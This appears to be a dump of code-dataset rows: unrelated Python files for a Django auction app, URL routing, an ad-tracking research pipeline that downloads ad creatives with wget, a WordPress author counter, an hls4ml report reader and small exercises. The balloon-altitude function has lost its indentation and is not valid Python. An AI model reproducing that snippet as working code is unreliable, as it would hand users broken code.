        except (cls.DoesNotExist, Product.DoesNotExist):
            # Bug fix: .get() raises DoesNotExist, never IndexError.
            return None

    @classmethod
    def getAuctionByProductID(cls, product_id):
        """Return the active auction selling `product_id`, or None."""
        try:
            return cls.objects.get(product=product_id, status_id=1)
        except cls.DoesNotExist:
            # Bug fix: .get() raises DoesNotExist, never IndexError.
            return None
class Bidder(models.Model):
    # A user acting as a buyer; linked to auctions through AuctionBidder,
    # which carries the individual bid rows.
    contender = models.ForeignKey(User, related_name='buyer', verbose_name='contender')
    auctions = models.ManyToManyField(Auction, related_name='auctions', through='AuctionBidder')
    version = IntegerVersionField()
    def __unicode__(self):
        # Python 2 string representation (this file predates Python 3).
        return smart_unicode(self.contender)
    class Meta:
        ordering = ["contender"]
class AuctionBidder(models.Model):
    """Through-model recording a single bid by a Bidder on an Auction."""
    unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
    auc = models.ForeignKey(Auction, related_name='unique_auction')
    bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
        verbose_name="bid amount")
    # auto_now expects a boolean flag; the previous `timezone.now()` argument
    # was merely truthy (and evaluated once at import time).
    bid_time = models.DateTimeField(auto_now_add=False, auto_now=True)
    version = IntegerVersionField()

    def __unicode__(self):
        # Python 2 string representation (this file predates Python 3).
        return smart_unicode(self.auc)

    class Meta:
        ordering = ["bid_time"]
|
8,083 | 592f29f08637e511bd7d49a3b58f69b700721d89 | def alt(h, dt):
t=0
while True:
t=t+1
a=(-6)*(t**4)+ h*(t**3)+2*(t**2)+t
if a<=0:
print('The balloon first touches ground at hour:')
print(t)
break
elif t==dt:
print('The balloon does not touch ground in the given time.')
break
return
alt(int(input()), int(input())) |
8,084 | 312a95c9514722157653365104d8cd0ada760ce8 | """URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [
    # Landing page area
    url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),
    url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),
    url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),
    url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),
    # Account management is done by allauth
    url(r'^accounts/', include('allauth.urls')),
    # Account profile and member info done locally
    url(r'^accounts/profile/$', account_profile, name='account_profile'),
    url(r'^member/$', member_index, name='user_home'),
    url(r'^member/action$', member_action, name='user_action'),
    # Usual Django admin
    url(r'^admin/', admin.site.urls),
    # static() serves STATIC_ROOT via Django itself -- a development
    # convenience; it returns an empty list when DEBUG is off.
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
8,085 | fdae984f7cf5e1c20dee197d3f2518a0c7c38bdc | from time import sleep
from uuid import uuid1
from pprint import pprint
from shutil import copy2
from multiprocessing import Process, Queue, Pool, Manager
from ad_grabber_classes import *
from adregex import *
from pygraph.classes.digraph import digraph
import os
import json
import jsonpickle
import subprocess
import cPickle
import logging
LOG = logging.getLogger("logAdGrabber")
ADREGEX = AdRegEx()
def check_duplicate(fp1, fp2):
  """takes two files, does a content comparison, returns True if same

  Uses stdlib filecmp (shallow=False compares bytes) instead of spawning a
  `diff` subprocess per pair. A missing/unreadable file compares as False,
  matching the old CalledProcessError behaviour.
  """
  import filecmp
  try:
    return filecmp.cmp(fp1, fp2, shallow=False)
  except OSError:
    return False
def identify_uniq_ads(session_results):
  """
  i) Identify duplicate ads (byte-identical files, binned by dimension)
  ii) bin the ads by their dimensions ('999-999' when probing fails)
  iii) Keep track of the test sites and how many times they have displayed
  each unique ad

  Returns (ads, error_bugs): `ads` maps each unique bug to a
  {test_site: display_count} dict; `error_bugs` lists bugs whose media file
  was never fetched (empty filepath).
  """
  # bin by dimensions
  ads = {}
  notads = {}
  swf_bin = {}
  img_bin = {}
  error_bugs = []
  for train_category, cat_dict in session_results.items():
    for test_site, bug_dict_list in cat_dict.items():
      for index_count in range(len(bug_dict_list)):
        bug_dict = bug_dict_list[index_count]
        for bug, bug_count in bug_dict.items():
          bug_filetype = bug.get_filetype()
          bug_filepath = bug.get_filepath()
          if bug_filepath == '':
            #LOG.debug('did not manage to curl the scripts for bug:%s' % bug)
            error_bugs.append(bug)
            continue
          if bug.is_ad(): # give zerofucks to non-ads
            # fallback dimensions when the probing tools below fail
            height = '999'
            width = '999'
            if bug_filetype == 'swf':
              # choose from the swf media bin; swfdump -X/-Y print the
              # stage width/height as the last token of their output
              target_bin = swf_bin
              try:
                width = subprocess.check_output(['swfdump', '-X',
                  bug_filepath]).split(' ')[-1].strip()
                height = subprocess.check_output(['swfdump', '-Y',
                  bug_filepath]).split(' ')[-1].strip()
              except subprocess.CalledProcessError :
                LOG.exception("swfdump error on file %s" % bug_filepath)
            else:
              # choose from the img media bin (ImageMagick `identify`)
              target_bin = img_bin
              LOG.debug(bug_filepath)
              try:
                height = subprocess.check_output(['identify', '-format', '"%h"',\
                  bug_filepath]).strip()
                width = subprocess.check_output(['identify', '-format','"%w"',\
                  bug_filepath]).strip()
              except subprocess.CalledProcessError:
                LOG.exception("identify error on file %s" % bug_filepath)
            try:
              bug.set_dimension(height, width)
              dimension = '%s-%s' % (height, width)
              # check all the images in the bin with the dimensions
              m_list = target_bin[dimension]
              dup = None
              for m in m_list:
                if check_duplicate(bug_filepath, m.get_filepath()):
                  dup = m
                  break
              if dup:
                # check if the duplicate ad came from a different test site
                if test_site in ads[dup]:
                  ads[dup][test_site] += bug_count
                else :
                  ads[dup] = {test_site : bug_count}
                # delete old bug reference, add new one and point to duplicated
                # bug
                # NOTE(review): mutating bug_dict while iterating its .items()
                # is safe on Python 2 (list snapshot) but would raise on
                # Python 3 -- this module is Python 2 code.
                del bug_dict[bug]
                bug_dict[dup] = bug_count
              else:
                target_bin[dimension].append(bug)
                ads[bug] = {test_site : bug_count}
              # tally up the results
            except KeyError: # The bin hasn't been created
              target_bin[dimension] = [bug]
              ads[bug] = {test_site : bug_count}
          # else:
          # notads
  return ads,error_bugs
def export_uniq_ads(ads, out_folder, rel_folder):
  """
  Takes all the uniq ads seen in this session, copies each media file into
  out_folder under a fresh UUID name, and writes its metadata
  information to out_folder/uniq_ads.csv. Mutates each bug (set_uuid) and
  returns the same `ads` mapping.
  """
  try :
    os.makedirs(out_folder)
    os.makedirs(os.path.join(out_folder, rel_folder))
  except OSError:
    # NOTE(review): if out_folder already exists, the first makedirs raises
    # and the rel_folder subdirectory is silently never created -- confirm
    # callers always pass a fresh out_folder.
    LOG.debug('Creating output folder')
  fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')
  # Relative location = Location of the ad within this current session
  # Global location, added when an ad is matched with existing ads in DB
  fwtr.write('#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\n')
  for bug in ads.keys():
    height, width = bug.get_dimension()
    filepath = bug.get_filepath()
    name = bug.get_name()
    src = bug.get_src()
    filetype = bug.get_filetype()
    new_uuidname = '%s.%s' % (uuid1(), filetype)
    bug.set_uuid(new_uuidname)
    new_filepath = os.path.join(out_folder, new_uuidname)
    rel_filepath = os.path.join(rel_folder, new_uuidname)
    # copy the media file under its new UUID name; the CSV row records both
    # the UUID and the session-relative path
    copy2(filepath, new_filepath)
    fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(new_uuidname,
      name, filetype, height, width, rel_filepath, src))
  fwtr.close()
  return ads
def write_run_info(RUNINFO_DIR, session_date):
  """Drop a '<session_date>.info' marker file containing 'OK' so the
  automation script can tell that this run has finished."""
  marker_path = os.path.join(RUNINFO_DIR, '%s.info' % session_date)
  with open(marker_path, 'w') as marker_file:
    marker_file.write('OK')
def write_session_info(vmid, machineid, profile, session_date, train_mode, training_sites,
    test_sites, num_of_refresh, export_folder):
  """Write this session's configuration to export_folder/session_info.csv."""
  # NOTE(review): .keys()[0] assumes Python 2 (list-returning keys()) and
  # that training_sites holds exactly one category -> site-list entry.
  train_category = training_sites.keys()[0]
  train_sites_to_visit = training_sites[train_category]
  with open(os.path.join(export_folder, 'session_info.csv'), 'w') as fwtr:
    fwtr.write('session_str : %s\n' % session_date)
    fwtr.write('machine_info : %s\n' % machineid)
    fwtr.write('vmid : %s\n' % vmid)
    fwtr.write('profile : %s\n' % profile)
    fwtr.write('train_mode : %s\n' % train_mode)
    fwtr.write('num_of_refresh : %d\n' % num_of_refresh)
    fwtr.write('training_topic : %s\n' % train_category)
    fwtr.write('training_sites : ')
    for site in train_sites_to_visit:
      fwtr.write('%s, ' % site)
    fwtr.write('\nnum_of_train_sites : %d\n' % len(train_sites_to_visit))
    fwtr.write('test_sites : ')
    for site in test_sites:
      # each test_sites entry is indexable; site[1] appears to be the URL --
      # TODO confirm against the caller
      fwtr.write('%s, ' % site[1])
    fwtr.write('\nnum_of_test_sites : %d\n' % len(test_sites))
def generate_stats(results, ads, vmid, session_date, export_folder, process_ex_time):
  """
  Generates stats on
  - uniq ads seen on the test sites
  - total number of ads seen on the test sites
  - total number of ads seen on all test sites
  - total number of uniq ads seen on all test sites

  Writes session_bugs.csv (one row per displayed ad) and session_stats.csv
  (per-site totals plus session metadata) into export_folder.
  """
  try:
    os.makedirs(export_folder)
  except OSError:
    # folder already exists -- fine, we only append files into it
    pass
  # to be read and inserted into db
  totalads = 0 # total number of ads seen during this session
  totaluniqads = len(ads) # does not support multicategories at this point
  # for each category, for each test site, count total number of ads seen
  totalad_category = {}
  # for each category, for each test site, count total number of uniq ads seen
  uniqad_category = {}
  with open(os.path.join(export_folder, 'session_bugs.csv'), 'w') as bugs_wtr:
    # the trailing backslash is a continuation *inside* the string literal,
    # so the header is written as one line
    bugs_wtr.write('#Ad-UID, Website-URL, Refresh-Num, Training-Topic,\
Site-Context, BugCount, BugSrc\n')
    for train_category, cat_dict in results.items():
      totalad_category[train_category] = {}
      uniqad_category[train_category] = {}
      for test_site, bug_dict_list in cat_dict.items():
        total_ads = 0 # for each site
        uniq_ads = [] # for each site
        for refresh_num in range(len(bug_dict_list)):
          bug_dict = bug_dict_list[refresh_num]
          for bug, bugcount in bug_dict.items():
            if bug.is_ad():
              uuid = bug.get_uuid()
              bugs_wtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\n'.format(uuid, test_site,
                refresh_num, train_category, 'N/A', bugcount, bug.get_src()))
              total_ads += bugcount
              if bug not in uniq_ads:
                uniq_ads.append(bug)
        totalad_category[train_category][test_site] = total_ads
        uniqad_category[train_category][test_site] = len(uniq_ads)
        totalads += total_ads # global count for total ads
  with open(os.path.join(export_folder, 'session_stats.csv'), 'w') as ses_wtr:
    # write some metadata information about this session
    ses_wtr.write('#VMID: %s\n' % vmid)
    ses_wtr.write('#Session-Date: %s\n' % session_date)
    ses_wtr.write('#Time to complete: %s\n' % process_ex_time)
    ses_wtr.write('#Training Categories: %s\n' % str(results.keys()))
    ses_wtr.write('#Total Number of ads: %d\n' % totalads)
    ses_wtr.write('#Total Uniq ads: %d\n\n' % totaluniqads)
    ses_wtr.write('#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\n')
    for train_category, cat_dict in results.items():
      for test_site, bug_dict_list in cat_dict.items():
        num_of_visit = len(bug_dict_list)
        ses_wtr.write('{0}, {1}, {2}, {3}, {4}\n'.format(train_category,
          test_site, num_of_visit, totalad_category[train_category][test_site],
          uniqad_category[train_category][test_site]))
def export_ads(results,out_folder):
    """
    This function creates a csv file which contains all the unique ads seen in
    each test site (including all the refreshes), and copies each ad creative
    into out_folder under a sequential file name for hand-labelling (mturk).

    results is a dictionary of the following
    results = { Category : Value, ... }
    value = { test_site_url : [ result1, result2, ... resultN], ... }
    resultN : { WebBug : count, ... }
    """
    try:
        os.makedirs(out_folder)
    except OSError:
        # folder already exists -- safe to keep going
        LOG.debug('Creating output file folder ...')
    export_ad_counter = 1 # assign unique number to ads for export to mturk
    #short_listed_companies = ['google adsense', 'doubleclick']
    with open(os.path.join(out_folder,'ad_labelling.csv'), 'w') as fwtr:
        # write the titles
        fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\n'.format(\
            'Ad#', 'Company', 'FileType', 'Ad-Category', 'Website-URL',\
            'Refresh-Num','Training-Topic', 'Context-of-site', 'Total', 'Ad-src'))
        # make sure we only add one ad
        for train_category, cat_dict in results.items():
            for test_site, bug_dict_list in cat_dict.items():
                for refresh_num in range(len(bug_dict_list)):
                    bug_dict = bug_dict_list[refresh_num]
                    for bug, bugcount in bug_dict.items():
                        if not bug.is_ad():
                            #TODO check bug_type in ffext
                            continue
                        # only creatives with a known image/flash type are exported
                        if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:
                            file_name = '%d.%s' % (export_ad_counter, bug.get_filetype())
                            new_location = os.path.join(out_folder, file_name)
                            copy2(bug.get_filepath(), new_location)
                            fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9},\
\n'.format(file_name, bug.get_name(), bug.get_filetype(),
                                '' ,test_site, refresh_num, train_category, 'N/A', bugcount,
                                bug.get_src()))
                            export_ad_counter += 1
def get_bug_type(file_type):
    """Map a `file -b` signature string to a (bug_type, is_ad) pair.

    Text-like payloads and 1x1 GIF tracking pixels are never counted as
    ads; other images and Flash objects are.
    """
    # plain text / markup responses are never ad creatives
    if file_type.startswith(('HTML', 'ASCII', 'UTF-8 Unicode English', 'very short')):
        return 'text', False
    # a 1x1 GIF is a tracking pixel, not a visible ad
    if file_type.startswith('GIF') and file_type.endswith('1 x 1'):
        return 'gif', False
    # visible creatives: map the file signature to an extension
    for signature, extension in (('PNG', 'png'), ('GIF', 'gif'),
                                 ('Macromedia Flash', 'swf'), ('JPEG', 'jpg')):
        if file_type.startswith(signature):
            return extension, True
    # unknown signature: fall back to text, not an ad
    return 'text', False
def parse_buginfo(entry):
    """
    Takes the json decoded bug information and inserts it into a WebBug instance
    """
    bug_info = entry['bug']
    ent_info = entry['ent']
    # spaces and slashes would break the on-disk file names derived from it
    sanitized_name = bug_info['name'].replace(' ', '').replace('/', '_')
    # 'affiliation' is optional in the plugin output
    affiliation = bug_info.get('affiliation', "")
    return WebBug(name=sanitized_name,
                  src=ent_info['policyContentLocation'],
                  affiliation=affiliation,
                  bug_type=bug_info['type'],
                  matched_pattern=bug_info['pattern'],
                  pathname=ent_info['pathname'])
def curl_worker_legacy(args):
    """Download one bug's payload, classify it, and report the result.

    args is a tuple of (output_dir, saved_file_name, path, bug,
    curl_result_queue). The payload is fetched with wget, classified with
    the unix 'file' tool, moved into output_dir (or output_dir/notad for
    non-ads), and the annotated bug is pushed onto curl_result_queue.
    """
    output_dir = args[0]
    saved_file_name = args[1]
    path = args[2]
    bug = args[3]
    curl_result_queue = args[4]
    # subprocess.call(['curl', '-o', path , bug.get_src() ])
    # single attempt (-t 1), quiet, 3 second timeout, write to `path`
    subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])
    # Use the unix tool 'file' to check filetype
    subpr_out = subprocess.check_output(['file', '-b', path]).strip()
    filetype, is_ad = get_bug_type(subpr_out)
    # file ads and non-ads into separate folders for hand-checking
    if is_ad:
        new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))
    else:
        new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\
            filetype))
    os.rename(path, new_path)
    # annotate the bug with what we learned before handing it back
    bug.set_is_ad(is_ad)
    bug.set_filetype(filetype)
    bug.set_filepath(new_path)
    curl_result_queue.put(bug)
def process_results_legacy(refresh_count, output_dir, ext_queue, result_queue,\
        num_of_workers=8):
    """
    This function goes through all the bugs identified by the firefox plugin and
    aggregates each bug's occurence in a given page. The aggregation is necessary
    for duplicate ads on the same page.

    Duplicates only bump a counter; the first sighting of each bug is
    downloaded by a pool of wget workers (curl_worker_legacy). The final
    {WebBug: count} dict is pickled into output_dir and pushed onto
    result_queue.
    """
    bug_dict = {} # maps each distinct WebBug to its occurrence count
    try:
        # separate the non-ads from the ads for ease of handchecking
        os.makedirs(output_dir)
        os.makedirs(os.path.join(output_dir, 'notad'))
    except OSError:
        # folders already exist from a previous visit
        pass
    # uses a pool of 'curl' workers
    curl_worker_pool = Pool(processes=num_of_workers)
    manager = Manager()
    curl_result_queue = manager.Queue()
    dl_counter = 0 # keep track of how many bugs downloaded
    while True:
        try:
            found_bugs = json.loads(ext_queue.get(block=True, timeout=2))
        except Exception:
            # 2s without new data from the extension: the page is done
            LOG.debug('Timing out on get from queue...')
            break
        for entry in found_bugs:
            # keep parsing consistent with process_results()
            bug = parse_buginfo(entry)
            try:
                # matched an entry in the bugdict, incr count and continue
                bug_dict[bug] += 1
                continue
            except KeyError:
                bug_dict[bug] = 1
            saved_location = 'Visit%d_%s%d' % (refresh_count, bug.get_name(),\
                dl_counter)
            dl_counter += 1
            save_to_path = os.path.join(output_dir, '%s' % saved_location)
            curl_worker_pool.apply_async(curl_worker_legacy, \
                ((output_dir, saved_location, save_to_path, bug, curl_result_queue),))
    # BUGFIX: close() must precede join(). The old code called join() on a
    # still-running pool, which raises ValueError; the bare except swallowed
    # it, so results could be collected before every download had finished.
    curl_worker_pool.close()
    curl_worker_pool.join()
    while not curl_result_queue.empty():
        cbug = curl_result_queue.get()
        # re-insert so the dict key becomes the downloaded bug, which
        # carries the filetype/filepath metadata the original key lacks
        bugcount = bug_dict[cbug]
        del bug_dict[cbug]
        bug_dict[cbug] = bugcount
    with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:
        cPickle.dump(bug_dict, fwtr)
    result_queue.put(bug_dict)
def curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\
        ack_queue):
    """Worker process: download, classify and file each queued bug.

    Consumes (saved_file_name, path, bug) tasks from input_queue until a
    ("STOP",) sentinel arrives, then acknowledges shutdown by putting
    worker_id onto ack_queue. Each successfully downloaded bug is
    annotated (is_ad, filetype, filepath) and pushed onto
    worker_output_queue; failed downloads are logged and skipped.
    """
    while True:
        try:
            task = input_queue.get()
        except Exception:
            LOG.error('Error:')
            continue
        if len(task) == 1 and task[0] == "STOP":
            LOG.debug('curl_worker %d received stop' % worker_id)
            break
        saved_file_name = task[0]
        path = task[1]
        bug = task[2]
        try:
            # subprocess.call(['curl', '-o', path , bug.get_src()])
            # single attempt (-t 1), quiet, 3 second timeout
            subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()])
            subpr_out = subprocess.check_output(['file', '-b', path]).strip()
        except Exception as e:
            # BUGFIX: the old code fell through with `subpr_out` unbound
            # (NameError on the very first failure, stale data afterwards);
            # skip this task instead -- the consumer keeps its aggregate
            # count for bugs that never come back.
            LOG.debug('Exception captured %s\n\n' % e)
            continue
        filetype, is_ad = get_bug_type(subpr_out)
        # file ads and non-ads into separate folders for hand-checking
        if is_ad:
            new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype))
        else:
            new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\
                filetype))
        os.rename(path, new_path)
        bug.set_is_ad(is_ad)
        bug.set_filetype(filetype)
        bug.set_filepath(new_path)
        worker_output_queue.put(bug)
    ack_queue.put(worker_id)
    return
def build_nodes(jsonData):
    """
    This function takes a JSON encoded output of the firefox addon and builds a
    call graph for the javascript/HTML redirections
    @rtype nodes: dict
    @return: A graph of redirection chains (domain -> WebNode)
    """
    nodes = {}
    def _process_cookiestr(cookieStr):
        """
        parses a dictionary of req/resp calls to extract the cookie information
        returns a list of cookies set on this domain
        """
        cookie_list = []
        # parses cookie str if a cookie has been set
        for cookie in cookieStr.split('\n'):
            c = {}
            for cook in cookie.split(';'):
                token = cook.split('=', 1)
                if len(token) < 2:
                    # usually this is just a flag e.g HTTPOnly, HTTPSOnly
                    continue
                c[token[0]] = token[1]
            cookie_list.append(c)
        return cookie_list
    def _check_node(d):
        """Return the WebNode for domain *d*, creating it on first sight."""
        try:
            domain_node = nodes[d]
        except KeyError:
            # BUGFIX: classify the domain we were asked about (d), not the
            # `domain` loop variable captured from the enclosing scope --
            # referrer nodes used to be matched against the wrong URL.
            isBug, bug_name, bug_type = ADREGEX.search(d)
            domain_node = WebNode(d, isBug, bug_name, bug_type)
            nodes[d] = domain_node
        return domain_node
    #jsonData contains all the domains and all the req/resp pairs made to them
    #iterating over the domains first
    for domain, dval in jsonData.items():
        # but first check if a node for this domain has been created or not
        domain_node = _check_node(domain)
        cookie_list = []
        # iterating thru all the req/resp pairs on a domain
        for info in dval:
            domainPath = info['domainPath']
            referrerPath = info['referrerPath']
            referrer = info['referrer']
            cookieBool = info['cookie']
            parsed_cookie = None
            if cookieBool:
                cookieStr = info['cookiestr']
                parsed_cookie = _process_cookiestr(cookieStr)
                cookie_list.append(parsed_cookie)
            domain_node.add_reqresp({'domainPath' : domainPath,
                                     'referrer' : referrer,
                                     'referrerPath' : referrerPath,
                                     'cookieList' : parsed_cookie
                                    })
            # making sure that we also create the node for the referrer
            referrer_node = _check_node(referrer)
            referrer_node.add_child(domain_node)
            domain_node.add_parent(referrer_node)
        domain_node.set_cookies(cookie_list)
    return nodes
def filter_results(extQueue, timeout_value, url):
    """
    This function takes the JSON output of the firefox addon, and matches the
    request URL against a list of known tracker/ads regexes.
    Returns data structure containing request/resp info
    Returns None if did not receive results from FF addon
    """
    from Queue import Empty
    try:
        LOG.debug('Timeout value in filter_result :%d' % timeout_value)
        # block until the addon posts its results, or give up after timeout
        nodes = extQueue.get(True, timeout=timeout_value)
    except Empty as e:
        LOG.info('Did not receive any results from FF plugin for %s' % url)
        nodes = None
    finally:
        # drain any leftover messages so the next page visit starts clean
        while not extQueue.empty():
            extQueue.get()
    return nodes
def process_results(refresh_count, output_dir, ext_queue, result_queue,
                    num_of_workers=8):
    """
    This function goes through all the bugs identified by the firefox plugin and
    aggregates each bug's occurence in a given page. The aggregation is necessary
    for duplicate ads on the same page.

    Spawns num_of_workers curl_worker processes fed through input_queue;
    the first sighting of each bug is queued for download, duplicates only
    bump its counter. The final {WebBug: count} dict is pickled into
    output_dir and pushed onto result_queue.
    """
    workers_dict = {} # keep track of worker processes
    input_queue = Queue() # asynchronously feed workers task to do
    worker_output_queue = Queue() # output queue from workers
    ack_queue = Queue()
    bug_dict = {} # dict to keep track of how many duplicates of each bug, if
                  # exists
    try:
        # separate the non-ads from the ads for ease of handchecking
        os.makedirs(output_dir)
        os.makedirs(os.path.join(output_dir, 'notad'))
    except OSError:
        # Directory is created, Okay to pass
        pass
    for i in range(num_of_workers):
        p = Process(target=curl_worker, args=(output_dir, input_queue,\
            worker_output_queue, i, ack_queue))
        p.start()
        workers_dict[i] = p
    # uses a pool nodesurl' workers
    # curl_worker_pool = Pool(processes=8)
    # manager = Manager()
    # curl_result_queue = manager.Queue()
    dl_counter = 0 # keep track of how many bugs downloaded
    while True:
        try:
            found_bugs = json.loads(ext_queue.get(block=True, timeout=2))
        except Exception:
            # 2s without new data from the extension: the page is done
            LOG.debug('No more bugs found, break out of queue')
            break
        for entry in found_bugs:
            bug = parse_buginfo(entry)
            try:
                # matched an entry in the bugdict, incr count and continue
                bug_dict[bug] += 1
                continue
            except KeyError:
                bug_dict[bug] = 1
            try:
                saved_location ='Visit%d_%s%d' % (refresh_count, bug.get_name(), dl_counter)
                dl_counter += 1
                save_to_path = os.path.join( output_dir, '%s' % saved_location)
                input_queue.put((saved_location, save_to_path, bug))
            except Exception as e:
                LOG.exception('%s' % e)
    for i in range(num_of_workers):
        # send stop signal
        input_queue.put(("STOP",))
    stopped = 0
    while stopped < len(workers_dict):
        # each worker acknowledges with its own id just before exiting
        ack = ack_queue.get()
        p = workers_dict[ack]
        p.join(timeout=1)
        if p.is_alive():
            p.terminate()
            LOG.debug('terminating process %d' % ack)
        stopped += 1
    while not worker_output_queue.empty():
        # receive results from the worker
        cbug = worker_output_queue.get()
        # re-insert so the dict key becomes the downloaded bug, which
        # carries the filetype/filepath metadata the original key lacks
        bugcount = bug_dict[cbug]
        del bug_dict[cbug]
        bug_dict[cbug] = bugcount
    with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr:
        cPickle.dump(bug_dict, fwtr)
    result_queue.put(bug_dict)
    return
|
8,086 | cf5062c999c6c29f103428c247d8d1a4550f9d75 | file = open('thegazelle.wordpress.2016-06-22.xml', 'r')
# Scan the WordPress export textually for <wp:author_display_name>
# elements; the values are CDATA-wrapped, so the wrapper is stripped off.
text = file.read()
authors = []
# locate the first author tag and cut out its CDATA payload
start = text.find("<wp:author_display_name>")
length = len("<wp:author_display_name>")
# NOTE(review): the closing tag searched for here is missing its trailing
# '>' -- it still matches, but looks unintentional; confirm.
end = text.find("</wp:author_display_name")
authors.append(text[start+length+len("<![CDATA["):end-len("]]>")])
# walk forward through every subsequent author tag
while text.find("<wp:author_display_name>", start+1) != -1:
    start = text.find("<wp:author_display_name>", start+1)
    end = text.find("</wp:author_display_name>", end+1)
    authors.append(text[start+length+len("<![CDATA["):end-len("]]>")])
authors.sort()
for author in authors:
    print(author)
# after sorting, adjacent equal names indicate duplicates
for i in range(len(authors)-1):
    if (authors[i] == authors[i+1]):
        print(authors[i], "was double counted")
print(len(authors)) |
8,087 | 7d173b0571c20dc8fcae884451e8f69ba3a05763 | from __future__ import print_function
import os
import re
import xml.etree.ElementTree as ET
def read_vivado_report(hls_dir, full_report=False):
    """Locate the Vivado HLS project under *hls_dir* and print the reports
    of every solution it contains.

    Prints a diagnostic and returns early when the path, the build script
    data, or the project directory is missing.
    """
    if not os.path.exists(hls_dir):
        print('Path {} does not exist. Exiting.'.format(hls_dir))
        return
    build_script = hls_dir + '/build_prj.tcl'
    if os.path.isfile(build_script):
        prj_dir, top_func_name = _parse_build_script(build_script)
    else:
        prj_dir = top_func_name = None
    if prj_dir is None or top_func_name is None:
        print('Unable to read project data. Exiting.')
        return
    sln_dir = hls_dir + '/' + prj_dir
    if not os.path.exists(sln_dir):
        print('Project {} does not exist. Rerun "hls4ml build -p {}".'.format(prj_dir, hls_dir))
        return
    solutions = _find_solutions(sln_dir)
    print('Found {} solution(s) in {}.'.format(len(solutions), sln_dir))
    for solution in solutions:
        print('Reports for solution "{}":\n'.format(solution))
        _find_reports(sln_dir + '/' + solution, top_func_name, full_report)
def _parse_build_script(script_path):
prj_dir = None
top_func_name = None
with open(script_path, 'r') as f:
for line in f.readlines():
if 'open_project' in line:
prj_dir = line.split()[-1]
elif 'set_top' in line:
top_func_name = line.split()[-1]
return prj_dir, top_func_name
def _find_solutions(sln_dir):
solutions = []
if os.path.isfile(sln_dir + '/vivado_hls.app'):
with open(sln_dir + '/vivado_hls.app') as f:
# Get rid of namespaces (workaround to support two types of vivado_hls.app files)
xmlstring = re.sub(' xmlns="[^"]+"', '', f.read(), count=1)
root = ET.fromstring(xmlstring)
for sln_tag in root.findall('solutions/solution'):
sln_name = sln_tag.get('name')
if sln_name is not None and os.path.isdir(sln_dir + '/' + sln_name):
solutions.append(sln_name)
return solutions
def _find_reports(sln_dir, top_func_name, full_report=False):
    """Print the C-simulation and synthesis reports of one solution,
    emitting a short notice for each report that is missing."""
    csim_file = sln_dir + '/csim/report/{}_csim.log'.format(top_func_name)
    syn_file = sln_dir + '/syn/report/{}_csynth.rpt'.format(top_func_name)
    reports = (
        (csim_file, lambda path: _show_csim_report(path),
         'C simulation report not found.'),
        (syn_file, lambda path: _show_synth_report(path, full_report),
         'Synthesis report not found.'),
    )
    for path, show, missing_msg in reports:
        if os.path.isfile(path):
            show(path)
        else:
            print(missing_msg)
def _show_csim_report(csim_file):
    """Dump the whole C simulation log to stdout."""
    print('C SIMULATION RESULT:')
    with open(csim_file, 'r') as log:
        print(log.read())
def _show_synth_report(synth_file, full_report=False):
    """Print the synthesis report, skipping its first two lines and
    stopping at the '* DSP48' section unless full_report is requested."""
    print('SYNTHESIS REPORT:')
    with open(synth_file, 'r') as report:
        lines = report.readlines()
    for line in lines[2:]:
        if not full_report and '* DSP48' in line:
            break
        print(line, end='')
|
8,088 | c7c405535b2ca656d4d5f18013e3e2fdef70efea | """
1. Если в строке больше символов в нижнем регистре - вывести все в нижнем,
если больше в верхнем - вывести все в верхнем,
если поровну - вывести в противоположных регистрах.
2. Если в строке каждое слово начинается с заглавной буквы, тогда
добавить в начало строки 'done. '.
Иначе заменить первые 5 элементов строки на 'draft: '.
(можно использовать метод replace и/или конкатенацию строк + срезы)
3. Если длина строки больше 20, то обрезать лишние символы до 20.
Иначе дополнить строку символами '@' до длины 20.
(можно использовать метод ljust либо конкатенацию и дублирование (+ и *))
После выполнения кажого пункта выводить результат типа:
1. Исходная строка: "some string".
Результат: "some edited string".
(Использовать форматирование строк f либо метод format)
"""
string = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'

# Task 1: compare upper- vs lower-case counts and re-case accordingly.
title_regist = 0  # kept for parity with the original exercise (unused)
upp_regist = sum(1 for char in string if char.isupper())
low_regist = sum(1 for char in string if char.islower())
print('Some string:', string)
if upp_regist > low_regist:
    recased = string.upper()
elif low_regist > upp_regist:
    recased = string.lower()
else:
    recased = string.swapcase()
print('Some edited string:', recased)

